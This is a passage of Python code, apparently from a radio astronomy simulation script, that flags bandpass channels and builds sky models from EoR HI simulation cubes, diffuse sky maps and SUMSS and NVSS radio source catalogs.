# pfb_filtered = DSP.fft_filter(bandpass_shape.ravel(), wts=freq_wts.ravel(), passband='high')
# pfb_edge_channels = pfb_filtered.argsort()[:int(1.0*n_channels/coarse_channel_width)]
pfb_edge_channels = NP.hstack((pfb_edge_channels.ravel(), NP.asarray([pfb_edge_channels.min()-coarse_channel_width, pfb_edge_channels.max()+coarse_channel_width])))
flagged_edge_channels += [range(max(0,pfb_edge-n_edge_flag[0]),min(n_channels,pfb_edge+n_edge_flag[1])) for pfb_edge in pfb_edge_channels]
else:
pfb_str = 'no_pfb_'
window = n_channels * DSP.windowing(n_channels, shape=bpass_shape, pad_width=n_pad, centering=True, area_normalize=True)
if bandpass_correct:
bpcorr = 1/bandpass_shape
bandpass_shape = NP.ones(base_bpass.size)
else:
bpcorr = 1.0*NP.ones(nchan)
noise_bpcorr = 1.0*NP.ones(nchan)
if noise_bandpass_correct:
noise_bpcorr = NP.copy(bpcorr)
if not flag_repeat_edge_channels:
flagged_edge_channels += [range(0,n_edge_flag[0])]
flagged_edge_channels += [range(n_channels-n_edge_flag[1],n_channels)]
flagged_channels = flagged_edge_channels
if flag_chan[0] >= 0:
flag_chan = flag_chan[flag_chan < n_channels]
if bp_flag_repeat:
flag_chan = NP.mod(flag_chan, coarse_channel_width)
flagged_channels += [[i*coarse_channel_width+flagchan for i in range(n_channels/coarse_channel_width) for flagchan in flag_chan]]
else:
flagged_channels += [flag_chan.tolist()]
flagged_channels = [x for y in flagged_channels for x in y]
flagged_channels = list(set(flagged_channels))
bandpass_shape[flagged_channels] = 0.0
bpass = base_bpass * bandpass_shape
n_sky_sectors = args['n_sky_sectors']
if (n_sky_sectors < 1):
n_sky_sectors = 1
if use_HI_monopole or use_HI_fluctuations or use_HI_cube:
if use_lidz and use_21cmfast:
raise ValueError('Only one of Adam Lidz or 21CMFAST simulations can be chosen')
if not use_lidz and not use_21cmfast:
use_lidz = True
use_21cmfast = False
eor_simfile = '/data3/t_nithyanandan/EoR_simulations/Adam_Lidz/Boom_tiles/hpxcube_138.915-195.235_MHz_80.0_kHz_nside_{0:0d}.fits'.format(nside)
elif use_lidz:
eor_simfile = '/data3/t_nithyanandan/EoR_simulations/Adam_Lidz/Boom_tiles/hpxcube_138.915-195.235_MHz_80.0_kHz_nside_{0:0d}.fits'.format(nside)
elif use_21cmfast:
pass
# if plots:
# if rank == 0:
# ## Plot the pointings
# pointings_ha_orig = pointings_hadec_orig[:,0]
# pointings_ha_orig[pointings_ha_orig > 180.0] = pointings_ha_orig[pointings_ha_orig > 180.0] - 360.0
# pointings_ra_orig = pointings_radec_orig[:,0]
# pointings_ra_orig[pointings_ra_orig > 180.0] = pointings_ra_orig[pointings_ra_orig > 180.0] - 360.0
# pointings_dec_orig = pointings_radec_orig[:,1]
# fig = PLT.figure(figsize=(6,6))
# ax1a = fig.add_subplot(111)
# ax1a.set_xlabel('Local Sidereal Time [hours]', fontsize=18, weight='medium')
# ax1a.set_ylabel('Longitude [degrees]', fontsize=18, weight='medium')
# ax1a.set_xlim((lst_wrapped.min()-1)/15.0, (lst_wrapped.max()+1)/15.0)
# ax1a.set_ylim(pointings_ha_orig.min()-15.0, pointings_ha_orig.max()+15.0)
# ax1a.plot(lst_wrapped/15.0, pointings_ha_orig, 'k--', lw=2, label='HA')
# ax1a.plot(lst_wrapped/15.0, pointings_ra_orig, 'k-', lw=2, label='RA')
# ax1a.tick_params(which='major', length=18, labelsize=12)
# ax1a.tick_params(which='minor', length=12, labelsize=12)
# legend1a = ax1a.legend(loc='upper left')
# legend1a.draw_frame(False)
# for axis in ['top','bottom','left','right']:
# ax1a.spines[axis].set_linewidth(2)
# xticklabels = PLT.getp(ax1a, 'xticklabels')
# yticklabels = PLT.getp(ax1a, 'yticklabels')
# PLT.setp(xticklabels, fontsize=15, weight='medium')
# PLT.setp(yticklabels, fontsize=15, weight='medium')
# ax1b = ax1a.twinx()
# ax1b.set_ylabel('Declination [degrees]', fontsize=18, weight='medium')
# ax1b.set_ylim(pointings_dec_orig.min()-5.0, pointings_dec_orig.max()+5.0)
# ax1b.plot(lst_wrapped/15.0, pointings_dec_orig, 'k:', lw=2, label='Dec')
# ax1b.tick_params(which='major', length=12, labelsize=12)
# legend1b = ax1b.legend(loc='upper center')
# legend1b.draw_frame(False)
# yticklabels = PLT.getp(ax1b, 'yticklabels')
# PLT.setp(yticklabels, fontsize=15, weight='medium')
# fig.subplots_adjust(right=0.85)
# PLT.savefig('/data3/t_nithyanandan/project_MWA/figures/'+obs_mode+'_pointings.eps', bbox_inches=0)
# PLT.savefig('/data3/t_nithyanandan/project_MWA/figures/'+obs_mode+'_pointings.png', bbox_inches=0)
# ## Plot bandpass properties
# fig = PLT.figure(figsize=(7,6))
# ax = fig.add_subplot(111)
# ax.set_xlabel('frequency [MHz]', fontsize=18, weight='medium')
# ax.set_ylabel('gain', fontsize=18, weight='medium')
# ax.set_xlim(freq*1e-6 - 2.0, freq*1e-6 + 2.0)
# ax.set_ylim(0.05, 2.0*bpcorr.max())
# ax.set_yscale('log')
# try:
# ax.plot(1e3*chans, 10**(pfbwin_interp/10), 'k.--', lw=2, ms=10, label='Instrumental PFB Bandpass')
# except NameError:
# pass
# ax.plot(1e3*chans, bpcorr, 'k+:', lw=2, ms=10, label='Bandpass Correction')
# ax.plot(1e3*chans, bandpass_shape, 'k-', lw=2, label='Corrected Bandpass (Flagged)')
# # ax.plot(1e3*chans, 3.0+NP.zeros(n_channels), 'k-.', label='Flagging threshold')
# legend = ax.legend(loc='lower center')
# legend.draw_frame(False)
# ax.tick_params(which='major', length=18, labelsize=12)
# ax.tick_params(which='minor', length=12, labelsize=12)
# for axis in ['top','bottom','left','right']:
# ax.spines[axis].set_linewidth(2)
# xticklabels = PLT.getp(ax, 'xticklabels')
# yticklabels = PLT.getp(ax, 'yticklabels')
# PLT.setp(xticklabels, fontsize=15, weight='medium')
# PLT.setp(yticklabels, fontsize=15, weight='medium')
# PLT.savefig('/data3/t_nithyanandan/project_MWA/figures/bandpass_properties.eps', bbox_inches=0)
# PLT.savefig('/data3/t_nithyanandan/project_MWA/figures/bandpass_properties.png', bbox_inches=0)
fg_str = ''
flux_unit = args['flux_unit']
spindex_seed = args['spindex_seed']
spindex_rms = args['spindex_rms']
spindex_rms_str = ''
spindex_seed_str = ''
if spindex_rms > 0.0:
spindex_rms_str = '{0:.1f}'.format(spindex_rms)
else:
spindex_rms = 0.0
if spindex_seed is not None:
spindex_seed_str = '{0:0d}_'.format(spindex_seed)
if use_HI_fluctuations or use_HI_cube:
# if freq_resolution != 80e3:
# raise ValueError('Currently frequency resolution can only be set to 80 kHz')
fg_str = 'HI_cube'
hdulist = fits.open(eor_simfile)
nexten = hdulist['PRIMARY'].header['NEXTEN']
fitstype = hdulist['PRIMARY'].header['FITSTYPE']
temperatures = None
extnames = [hdulist[i].header['EXTNAME'] for i in xrange(1,nexten+1)]
if fitstype == 'IMAGE':
eor_simfreq = hdulist['FREQUENCY'].data['Frequency [MHz]']
else:
eor_simfreq = [float(extname.split(' ')[0]) for extname in extnames]
eor_simfreq = NP.asarray(eor_simfreq)
eor_freq_resolution = eor_simfreq[1] - eor_simfreq[0]
ind_chans, ind_eor_simfreq, dfrequency = LKP.find_1NN(eor_simfreq.reshape(-1,1), 1e3*chans.reshape(-1,1), distance_ULIM=0.5*eor_freq_resolution, remove_oob=True)
eor_simfreq = eor_simfreq[ind_eor_simfreq]
if fitstype == 'IMAGE':
temperatures = hdulist['TEMPERATURE'].data[:,ind_eor_simfreq]
else:
for i in xrange(eor_simfreq.size):
if i == 0:
temperatures = hdulist[ind_eor_simfreq[i]+1].data['Temperature'].reshape(-1,1)
else:
temperatures = NP.hstack((temperatures, hdulist[ind_eor_simfreq[i]+1].data['Temperature'].reshape(-1,1)))
if use_HI_fluctuations:
temperatures = temperatures - NP.mean(temperatures, axis=0, keepdims=True)
fg_str = 'HI_fluctuations'
# if use_HI_monopole:
# shp_temp = temperatures.shape
# temperatures = NP.mean(temperatures, axis=0, keepdims=True) + NP.zeros(shp_temp)
# fg_str = 'HI_monopole'
# elif use_HI_fluctuations:
# temperatures = temperatures - NP.mean(temperatures, axis=0, keepdims=True)
# fg_str = 'HI_fluctuations'
pixres = hdulist['PRIMARY'].header['PIXAREA']
coords_table = hdulist['COORDINATE'].data
ra_deg_EoR = coords_table['RA']
dec_deg_EoR = coords_table['DEC']
fluxes_EoR = temperatures * (2.0* FCNST.k * freq**2 / FCNST.c**2) * pixres / CNST.Jy
freq_EoR = freq/1e9
hdulist.close()
flux_unit = 'Jy'
catlabel = 'HI-cube'
spec_type = 'spectrum'
spec_parms = {}
skymod = SM.SkyModel(catlabel, chans*1e9, NP.hstack((ra_deg_EoR.reshape(-1,1), dec_deg_EoR.reshape(-1,1))), spec_type, spectrum=fluxes_EoR, spec_parms=None)
elif use_HI_monopole:
fg_str = 'HI_monopole'
theta, phi = HP.pix2ang(nside, NP.arange(HP.nside2npix(nside)))
gc = Galactic(l=NP.degrees(phi), b=90.0-NP.degrees(theta), unit=(units.degree, units.degree))
radec = gc.fk5
ra_deg_EoR = radec.ra.degree
dec_deg_EoR = radec.dec.degree
pixres = HP.nside2pixarea(nside) # pixel solid angle (steradians)
catlabel = 'HI-monopole'
spec_type = 'func'
spec_parms = {}
spec_parms['name'] = NP.repeat('tanh', ra_deg_EoR.size)
# spec_parms['freq-ref'] = freq/1e9 + NP.zeros(ra_deg.size)
spec_parms['freq-ref'] = freq_half + NP.zeros(ra_deg_EoR.size)
spec_parms['flux-scale'] = T_xi0 * (2.0* FCNST.k * freq**2 / FCNST.c**2) * pixres / CNST.Jy
spec_parms['flux-offset'] = 0.5*spec_parms['flux-scale'] + NP.zeros(ra_deg_EoR.size)
spec_parms['z-width'] = dz_half + NP.zeros(ra_deg_EoR.size)
flux_unit = 'Jy'
skymod = SM.SkyModel(catlabel, chans*1e9, NP.hstack((ra_deg_EoR.reshape(-1,1), dec_deg_EoR.reshape(-1,1))), spec_type, spec_parms=spec_parms)
spectrum = skymod.generate_spectrum()
elif use_GSM:
fg_str = 'asm'
dsm_file = args['DSM_file_prefix']+'_{0:.1f}_MHz_nside_{1:0d}.fits'.format(freq*1e-6, nside)
hdulist = fits.open(dsm_file)
pixres = hdulist[0].header['PIXAREA']
dsm_table = hdulist[1].data
ra_deg_DSM = dsm_table['RA']
dec_deg_DSM = dsm_table['DEC']
temperatures = dsm_table['T_{0:.0f}'.format(freq/1e6)]
fluxes_DSM = temperatures * (2.0* FCNST.k * freq**2 / FCNST.c**2) * pixres / CNST.Jy
spindex = dsm_table['spindex'] + 2.0
freq_DSM = freq/1e9 # in GHz
freq_catalog = freq_DSM * 1e9 + NP.zeros(fluxes_DSM.size)
catlabel = NP.repeat('DSM', fluxes_DSM.size)
ra_deg = ra_deg_DSM + 0.0
dec_deg = dec_deg_DSM + 0.0
majax = NP.degrees(HP.nside2resol(nside)) * NP.ones(fluxes_DSM.size)
minax = NP.degrees(HP.nside2resol(nside)) * NP.ones(fluxes_DSM.size)
# majax = NP.degrees(NP.sqrt(HP.nside2pixarea(64)*4/NP.pi) * NP.ones(fluxes_DSM.size))
# minax = NP.degrees(NP.sqrt(HP.nside2pixarea(64)*4/NP.pi) * NP.ones(fluxes_DSM.size))
fluxes = fluxes_DSM + 0.0
freq_SUMSS = 0.843 # in GHz
SUMSS_file = args['SUMSS_file']
catalog = NP.loadtxt(SUMSS_file, usecols=(0,1,2,3,4,5,10,12,13,14,15,16))
ra_deg_SUMSS = 15.0 * (catalog[:,0] + catalog[:,1]/60.0 + catalog[:,2]/3.6e3)
dec_dd = NP.loadtxt(SUMSS_file, usecols=(3,), dtype="|S3")
sgn_dec_str = NP.asarray([dec_dd[i][0] for i in range(dec_dd.size)])
sgn_dec = 1.0*NP.ones(dec_dd.size)
sgn_dec[sgn_dec_str == '-'] = -1.0
dec_deg_SUMSS = sgn_dec * (NP.abs(catalog[:,3]) + catalog[:,4]/60.0 + catalog[:,5]/3.6e3)
fmajax = catalog[:,7]
fminax = catalog[:,8]
fpa = catalog[:,9]
dmajax = catalog[:,10]
dminax = catalog[:,11]
PS_ind = NP.logical_and(dmajax == 0.0, dminax == 0.0)
ra_deg_SUMSS = ra_deg_SUMSS[PS_ind]
dec_deg_SUMSS = dec_deg_SUMSS[PS_ind]
fint = catalog[PS_ind,6] * 1e-3
if spindex_seed is None:
spindex_SUMSS = -0.83 + spindex_rms * NP.random.randn(fint.size)
else:
NP.random.seed(spindex_seed)
spindex_SUMSS = -0.83 + spindex_rms * NP.random.randn(fint.size)
fmajax = fmajax[PS_ind]
fminax = fminax[PS_ind]
fpa = fpa[PS_ind]
dmajax = dmajax[PS_ind]
dminax = dminax[PS_ind]
bright_source_ind = fint >= 10.0 * (freq_SUMSS*1e9/freq)**spindex_SUMSS
ra_deg_SUMSS = ra_deg_SUMSS[bright_source_ind]
dec_deg_SUMSS = dec_deg_SUMSS[bright_source_ind]
fint = fint[bright_source_ind]
fmajax = fmajax[bright_source_ind]
fminax = fminax[bright_source_ind]
fpa = fpa[bright_source_ind]
dmajax = dmajax[bright_source_ind]
dminax = dminax[bright_source_ind]
spindex_SUMSS = spindex_SUMSS[bright_source_ind]
valid_ind = NP.logical_and(fmajax > 0.0, fminax > 0.0)
ra_deg_SUMSS = ra_deg_SUMSS[valid_ind]
dec_deg_SUMSS = dec_deg_SUMSS[valid_ind]
fint = fint[valid_ind]
fmajax = fmajax[valid_ind]
fminax = fminax[valid_ind]
fpa = fpa[valid_ind]
spindex_SUMSS = spindex_SUMSS[valid_ind]
freq_catalog = NP.concatenate((freq_catalog, freq_SUMSS*1e9 + NP.zeros(fint.size)))
catlabel = NP.concatenate((catlabel, NP.repeat('SUMSS', fint.size)))
ra_deg = NP.concatenate((ra_deg, ra_deg_SUMSS))
dec_deg = NP.concatenate((dec_deg, dec_deg_SUMSS))
spindex = NP.concatenate((spindex, spindex_SUMSS))
majax = NP.concatenate((majax, fmajax/3.6e3))
minax = NP.concatenate((minax, fminax/3.6e3))
fluxes = NP.concatenate((fluxes, fint))
nvss_file = args['NVSS_file']
freq_NVSS = 1.4 # in GHz
hdulist = fits.open(nvss_file)
ra_deg_NVSS = hdulist[1].data['RA(2000)']
dec_deg_NVSS = hdulist[1].data['DEC(2000)']
nvss_fpeak = hdulist[1].data['PEAK INT']
nvss_majax = hdulist[1].data['MAJOR AX']
nvss_minax = hdulist[1].data['MINOR AX']
hdulist.close()
if spindex_seed is None:
spindex_NVSS = -0.83 + spindex_rms * NP.random.randn(nvss_fpeak.size)
else:
NP.random.seed(2*spindex_seed)
spindex_NVSS = -0.83 + spindex_rms * NP.random.randn(nvss_fpeak.size)
not_in_SUMSS_ind = NP.logical_and(dec_deg_NVSS > -30.0, dec_deg_NVSS <= min(90.0, latitude+90.0))
bright_source_ind = nvss_fpeak >= 10.0 * (freq_NVSS*1e9/freq)**(spindex_NVSS)
PS_ind = NP.sqrt(nvss_majax**2-(0.75/60.0)**2) < 14.0/3.6e3
count_valid = NP.sum(NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind))
nvss_fpeak = nvss_fpeak[NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind)]
freq_catalog = NP.concatenate((freq_catalog, freq_NVSS*1e9 + NP.zeros(count_valid)))
catlabel = NP.concatenate((catlabel, NP.repeat('NVSS',count_valid)))
ra_deg = NP.concatenate((ra_deg, ra_deg_NVSS[NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind)]))
dec_deg = NP.concatenate((dec_deg, dec_deg_NVSS[NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind)]))
spindex = NP.concatenate((spindex, spindex_NVSS[NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind)]))
majax = NP.concatenate((majax, nvss_majax[NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind)]))
minax = NP.concatenate((minax, nvss_minax[NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind)]))
fluxes = NP.concatenate((fluxes, nvss_fpeak))
# ctlgobj = SM.Catalog(catlabel, freq_catalog, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), fluxes, spectral_index=spindex, src_shape=NP.hstack((majax.reshape(-1,1),minax.reshape(-1,1),NP.zeros(fluxes.size).reshape(-1,1))), src_shape_units=['degree','degree','degree'])
# ctlgobj = SM.Catalog(catlabel, freq_catalog, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), fluxes, spectral_index=spindex)
spec_type = 'func'
spec_parms = {}
# spec_parms['name'] = NP.repeat('tanh', ra_deg.size)
spec_parms['name'] = NP.repeat('power-law', ra_deg.size)
spec_parms['power-law-index'] = spindex
# spec_parms['freq-ref'] = freq/1e9 + NP.zeros(ra_deg.size)
spec_parms['freq-ref'] = freq_catalog + NP.zeros(ra_deg.size)
spec_parms['flux-scale'] = fluxes
spec_parms['flux-offset'] = NP.zeros(ra_deg.size)
spec_parms['freq-width'] = NP.zeros(ra_deg.size)
flux_unit = 'Jy'
skymod = SM.SkyModel(catlabel, chans*1e9, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), spec_type, spec_parms=spec_parms, src_shape=NP.hstack((majax.reshape(-1,1),minax.reshape(-1,1),NP.zeros(fluxes.size).reshape(-1,1))), src_shape_units=['degree','degree','degree'])
elif use_DSM:
fg_str = 'dsm'
dsm_file = args['DSM_file_prefix']+'_{0:.1f}_MHz_nside_{1:0d}.fits'.format(freq*1e-6, nside)
hdulist = fits.open(dsm_file)
pixres = hdulist[0].header['PIXAREA']
dsm_table = hdulist[1].data
ra_deg_DSM = dsm_table['RA']
dec_deg_DSM = dsm_table['DEC']
temperatures = dsm_table['T_{0:.0f}'.format(freq/1e6)]
fluxes_DSM = temperatures * (2.0 * FCNST.k * freq**2 / FCNST.c**2) * pixres / CNST.Jy
flux_unit = 'Jy'
spindex = dsm_table['spindex'] + 2.0
freq_DSM = freq/1e9 # in GHz
freq_catalog = freq_DSM * 1e9 + NP.zeros(fluxes_DSM.size)
catlabel = NP.repeat('DSM', fluxes_DSM.size)
ra_deg = ra_deg_DSM
dec_deg = dec_deg_DSM
majax = NP.degrees(HP.nside2resol(nside)) * NP.ones(fluxes_DSM.size)
minax = NP.degrees(HP.nside2resol(nside)) * NP.ones(fluxes_DSM.size)
# majax = NP.degrees(NP.sqrt(HP.nside2pixarea(64)*4/NP.pi) * NP.ones(fluxes_DSM.size))
# minax = NP.degrees(NP.sqrt(HP.nside2pixarea(64)*4/NP.pi) * NP.ones(fluxes_DSM.size))
fluxes = fluxes_DSM
# ctlgobj = SM.Catalog(catlabel, freq_catalog, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), fluxes, spectral_index=spindex, src_shape=NP.hstack((majax.reshape(-1,1),minax.reshape(-1,1),NP.zeros(fluxes.size).reshape(-1,1))), src_shape_units=['degree','degree','degree'])
hdulist.close()
spec_type = 'func'
spec_parms = {}
# spec_parms['name'] = NP.repeat('tanh', ra_deg.size)
spec_parms['name'] = NP.repeat('power-law', ra_deg.size)
spec_parms['power-law-index'] = spindex
# spec_parms['freq-ref'] = freq/1e9 + NP.zeros(ra_deg.size)
spec_parms['freq-ref'] = freq_catalog + NP.zeros(ra_deg.size)
spec_parms['flux-scale'] = fluxes
spec_parms['flux-offset'] = NP.zeros(ra_deg.size)
spec_parms['freq-width'] = NP.zeros(ra_deg.size)
skymod = SM.SkyModel(catlabel, chans*1e9, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), spec_type, spec_parms=spec_parms, src_shape=NP.hstack((majax.reshape(-1,1),minax.reshape(-1,1),NP.zeros(fluxes.size).reshape(-1,1))), src_shape_units=['degree','degree','degree'])
elif use_USM:
fg_str = 'usm'
dsm_file = args['DSM_file_prefix']+'_{0:.1f}_MHz_nside_{1:0d}.fits'.format(freq*1e-6, nside)
hdulist = fits.open(dsm_file)
pixres = hdulist[0].header['PIXAREA']
dsm_table = hdulist[1].data
ra_deg = dsm_table['RA']
dec_deg = dsm_table['DEC']
temperatures = dsm_table['T_{0:.0f}'.format(freq/1e6)]
avg_temperature = NP.mean(temperatures)
fluxes_USM = avg_temperature * (2.0 * FCNST.k * freq**2 / FCNST.c**2) * pixres / CNST.Jy * NP.ones(temperatures.size)
spindex = NP.zeros(fluxes_USM.size)
freq_USM = 0.185 # in GHz
freq_catalog = freq_USM * 1e9 + NP.zeros(fluxes_USM.size)
catlabel = NP.repeat('USM', fluxes_USM.size)
majax = NP.degrees(HP.nside2resol(nside)) * NP.ones(fluxes_USM.size)
minax = NP.degrees(HP.nside2resol(nside)) * NP.ones(fluxes_USM.size)
# ctlgobj = SM.Catalog(catlabel, freq_catalog, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), fluxes_USM, spectral_index=spindex, src_shape=NP.hstack((majax.reshape(-1,1),minax.reshape(-1,1),NP.zeros(fluxes_USM.size).reshape(-1,1))), src_shape_units=['degree','degree','degree'])
hdulist.close()
flux_unit = 'Jy'
spec_type = 'func'
spec_parms = {}
# spec_parms['name'] = NP.repeat('tanh', ra_deg.size)
spec_parms['name'] = NP.repeat('power-law', ra_deg.size)
spec_parms['power-law-index'] = spindex
# spec_parms['freq-ref'] = freq/1e9 + NP.zeros(ra_deg.size)
spec_parms['freq-ref'] = freq_catalog + NP.zeros(ra_deg.size)
spec_parms['flux-scale'] = fluxes_USM
spec_parms['flux-offset'] = NP.zeros(ra_deg.size)
spec_parms['freq-width'] = NP.zeros(ra_deg.size)
skymod = SM.SkyModel(catlabel, chans*1e9, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), spec_type, spec_parms=spec_parms, src_shape=NP.hstack((majax.reshape(-1,1),minax.reshape(-1,1),NP.zeros(fluxes.size).reshape(-1,1))), src_shape_units=['degree','degree','degree'])
elif use_CSM:
fg_str = 'csm'
freq_SUMSS = 0.843 # in GHz
SUMSS_file = args['SUMSS_file']
catalog = NP.loadtxt(SUMSS_file, usecols=(0,1,2,3,4,5,10,12,13,14,15,16))
ra_deg_SUMSS = 15.0 * (catalog[:,0] + catalog[:,1]/60.0 + catalog[:,2]/3.6e3)
dec_dd = NP.loadtxt(SUMSS_file, usecols=(3,), dtype="|S3")
sgn_dec_str = NP.asarray([dec_dd[i][0] for i in range(dec_dd.size)])
sgn_dec = 1.0*NP.ones(dec_dd.size)
sgn_dec[sgn_dec_str == '-'] = -1.0
dec_deg_SUMSS = sgn_dec * (NP.abs(catalog[:,3]) + catalog[:,4]/60.0 + catalog[:,5]/3.6e3)
fmajax = catalog[:,7]
fminax = catalog[:,8]
fpa = catalog[:,9]
dmajax = catalog[:,10]
dminax = catalog[:,11]
PS_ind = NP.logical_and(dmajax == 0.0, dminax == 0.0)
ra_deg_SUMSS = ra_deg_SUMSS[PS_ind]
dec_deg_SUMSS = dec_deg_SUMSS[PS_ind]
fint = catalog[PS_ind,6] * 1e-3
if spindex_seed is None:
spindex_SUMSS = -0.83 + spindex_rms * NP.random.randn(fint.size)
else:
NP.random.seed(spindex_seed)
spindex_SUMSS = -0.83 + spindex_rms * NP.random.randn(fint.size)
fmajax = fmajax[PS_ind]
fminax = fminax[PS_ind]
fpa = fpa[PS_ind]
dmajax = dmajax[PS_ind]
dminax = dminax[PS_ind]
bright_source_ind = fint >= 10.0 * (freq_SUMSS*1e9/freq)**spindex_SUMSS
ra_deg_SUMSS = ra_deg_SUMSS[bright_source_ind]
dec_deg_SUMSS = dec_deg_SUMSS[bright_source_ind]
fint = fint[bright_source_ind]
fmajax = fmajax[bright_source_ind]
fminax = fminax[bright_source_ind]
fpa = fpa[bright_source_ind]
dmajax = dmajax[bright_source_ind]
dminax = dminax[bright_source_ind]
spindex_SUMSS = spindex_SUMSS[bright_source_ind]
valid_ind = NP.logical_and(fmajax > 0.0, fminax > 0.0)
ra_deg_SUMSS = ra_deg_SUMSS[valid_ind]
dec_deg_SUMSS = dec_deg_SUMSS[valid_ind]
fint = fint[valid_ind]
fmajax = fmajax[valid_ind]
fminax = fminax[valid_ind]
fpa = fpa[valid_ind]
spindex_SUMSS = spindex_SUMSS[valid_ind]
freq_catalog = freq_SUMSS*1e9 + NP.zeros(fint.size)
catlabel = NP.repeat('SUMSS', fint.size)
ra_deg = ra_deg_SUMSS + 0.0
dec_deg = dec_deg_SUMSS
spindex = spindex_SUMSS
majax = fmajax/3.6e3
minax = fminax/3.6e3
fluxes = fint + 0.0
nvss_file = args['NVSS_file']
freq_NVSS = 1.4 # in GHz
hdulist = fits.open(nvss_file)
ra_deg_NVSS = hdulist[1].data['RA(2000)']
dec_deg_NVSS = hdulist[1].data['DEC(2000)']
nvss_fpeak = hdulist[1].data['PEAK INT']
nvss_majax = hdulist[1].data['MAJOR AX']
nvss_minax = hdulist[1].data['MINOR AX']
hdulist.close()
if spindex_seed is None:
spindex_NVSS = -0.83 + spindex_rms * NP.random.randn(nvss_fpeak.size)
else:
NP.random.seed(2*spindex_seed)
spindex_NVSS = -0.83 + spindex_rms * NP.random.randn(nvss_fpeak.size)
not_in_SUMSS_ind = NP.logical_and(dec_deg_NVSS > -30.0, dec_deg_NVSS <= min(90.0, latitude+90.0))
bright_source_ind = nvss_fpeak >= 10.0 * (freq_NVSS*1e9/freq)**(spindex_NVSS)
PS_ind = NP.sqrt(nvss_majax**2-(0.75/60.0)**2) < 14.0/3.6e3
count_valid = NP.sum(NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind))
nvss_fpeak = nvss_fpeak[NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind)]
freq_catalog = NP.concatenate((freq_catalog, freq_NVSS*1e9 + NP.zeros(count_valid)))
catlabel = NP.concatenate((catlabel, NP.repeat('NVSS',count_valid)))
ra_deg = NP.concatenate((ra_deg, ra_deg_NVSS[NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind)]))
dec_deg = NP.concatenate((dec_deg, dec_deg_NVSS[NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind)]))
spindex = NP.concatenate((spindex, spindex_NVSS[NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind)]))
majax = NP.concatenate((majax, nvss_majax[NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind)]))
minax = NP.concatenate((minax, nvss_minax[NP.logical_and(NP.logical_and(not_in_SUMSS_ind, bright_source_ind), PS_ind)]))
fluxes = NP.concatenate((fluxes, nvss_fpeak))
# ctlgobj = SM.Catalog(catlabel, freq_catalog, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), fluxes, spectral_index=spindex, src_shape=NP.hstack((majax.reshape(-1,1),minax.reshape(-1,1),NP.zeros(fluxes.size).reshape(-1,1))), src_shape_units=['degree','degree','degree'])
spec_type = 'func'
spec_parms = {}
# spec_parms['name'] = NP.repeat('tanh', ra_deg.size)
spec_parms['name'] = NP.repeat('power-law', ra_deg.size)
spec_parms['power-law-index'] = spindex
# spec_parms['freq-ref'] = freq/1e9 + NP.zeros(ra_deg.size)
spec_parms['freq-ref'] = freq_catalog + NP.zeros(ra_deg.size)
spec_parms['flux-scale'] = fluxes
spec_parms['flux-offset'] = NP.zeros(ra_deg.size)
spec_parms['freq-width'] = NP.zeros(ra_deg.size)
flux_unit = 'Jy'
skymod = SM.SkyModel(catlabel, chans*1e9, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), spec_type, spec_parms=spec_parms, src_shape=NP.hstack((majax.reshape(-1,1),minax.reshape(-1,1),NP.zeros(fluxes.size).reshape(-1,1))), src_shape_units=['degree','degree','degree'])
elif use_SUMSS:
SUMSS_file = args['SUMSS_file']
catalog = NP.loadtxt(SUMSS_file, usecols=(0,1,2,3,4,5,10,12,13,14,15,16))
ra_deg = 15.0 * (catalog[:,0] + catalog[:,1]/60.0 + catalog[:,2]/3.6e3)
dec_dd = NP.loadtxt(SUMSS_file, usecols=(3,), dtype="|S3")
sgn_dec_str = NP.asarray([dec_dd[i][0] for i in range(dec_dd.size)])
sgn_dec = 1.0*NP.ones(dec_dd.size)
sgn_dec[sgn_dec_str == '-'] = -1.0
dec_deg = sgn_dec * (NP.abs(catalog[:,3]) + catalog[:,4]/60.0 + catalog[:,5]/3.6e3)
fmajax = catalog[:,7]
fminax = catalog[:,8]
fpa = catalog[:,9]
dmajax = catalog[:,10]
dminax = catalog[:,11]
PS_ind = NP.logical_and(dmajax == 0.0, dminax == 0.0)
ra_deg = ra_deg[PS_ind]
dec_deg = dec_deg[PS_ind]
fint = catalog[PS_ind,6] * 1e-3
fmajax = fmajax[PS_ind]
fminax = fminax[PS_ind]
fpa = fpa[PS_ind]
dmajax = dmajax[PS_ind]
dminax = dminax[PS_ind]
bright_source_ind = fint >= 1.0
ra_deg = ra_deg[bright_source_ind]
dec_deg = dec_deg[bright_source_ind]
fint = fint[bright_source_ind]
fmajax = fmajax[bright_source_ind]
fminax = fminax[bright_source_ind]
fpa = fpa[bright_source_ind]
dmajax = dmajax[bright_source_ind]
dminax = dminax[bright_source_ind]
valid_ind = NP.logical_and(fmajax > 0.0, fminax > 0.0)
ra_deg = ra_deg[valid_ind]
dec_deg = dec_deg[valid_ind]
fint = fint[valid_ind]
fmajax = fmajax[valid_ind]
fminax = fminax[valid_ind]
fpa = fpa[valid_ind]
freq_catalog = 0.843 # in GHz
if spindex_seed is None:
